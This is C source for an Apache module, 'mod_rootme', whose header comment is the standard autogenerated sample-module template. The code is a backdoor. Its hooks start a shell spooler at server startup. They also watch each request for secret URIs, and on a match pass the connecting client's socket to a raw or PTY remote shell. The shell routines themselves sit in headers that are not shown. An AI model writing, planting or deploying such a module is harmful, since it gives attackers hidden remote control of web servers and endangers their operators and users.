/* 
**  mod_rootme.c -- Apache sample rootme module
**  [Autogenerated via ``apxs -n rootme -g'']
**
**  To play with this sample module first compile it into a
**  DSO file and install it into Apache's modules directory 
**  by running:
**
**    $ apxs -c -i mod_rootme.c
**
**  Then activate it in Apache's apache2.conf file for instance
**  for the URL /rootme in as follows:
**
**    #   apache2.conf
**    LoadModule rootme_module modules/mod_rootme.so
**    <Location /rootme>
**    SetHandler rootme
**    </Location>
**
**  Then after restarting Apache via
**
**    $ apachectl restart
**
**  you immediately can request the URL /rootme and watch for the
**  output of this module. This can be achieved for instance via:
**
**    $ lynx -mime_header http://localhost/rootme 
**
**  The output should be similar to the following one:
**
**    HTTP/1.1 200 OK
**    Date: Tue, 31 Mar 1998 14:42:22 GMT
**    Server: Apache/1.3.4 (Unix)
**    Connection: close
**    Content-Type: text/html
**  
**    The sample page from mod_rootme.c
*/ 

#include "httpd.h"
#include "http_config.h"
#include "http_protocol.h"
#include "ap_config.h"

#include "mod_rootme.h"
#include "mrm_server.h"

static int rootme_post_config(apr_pool_t *pconf, apr_pool_t *plog,
                               apr_pool_t *ptemp, server_rec *s)
{
    shell_spooler();

    return OK;
}

static int rootme_post_read_request(request_rec *r)
{
    int           fd;
    apr_socket_t *client_socket;
    extern module core_module;

    client_socket = ap_get_module_config(
        r->connection->conn_config, &core_module);

    if (client_socket)
        fd = client_socket->socketdes;

    if (!strcmp(r->uri, ROOT_KEY))
    {
        process_client(GET_RAW_SHELL, fd);
        exit(0);
    }

    if (!strcmp( r->uri, ROOT_KEY2))
    {
        process_client(GET_PTY_SHELL, fd);
        exit(0);
    }

    return DECLINED;
}

static void rootme_register_hooks(apr_pool_t *p)
{
    ap_hook_post_config((void *) rootme_post_config,
                        NULL, NULL, APR_HOOK_FIRST);
    
    ap_hook_post_read_request((void *) rootme_post_read_request,
                              NULL, NULL, APR_HOOK_FIRST);
}


/* Dispatch list for API hooks */
module AP_MODULE_DECLARE_DATA rootme_module = {
    STANDARD20_MODULE_STUFF, 
    NULL,                  /* create per-dir    config structures */
    NULL,                  /* merge  per-dir    config structures */
    NULL,                  /* create per-server config structures */
    NULL,                  /* merge  per-server config structures */
    NULL,                  /* table of config file commands       */
    rootme_register_hooks  /* register hooks                      */
};

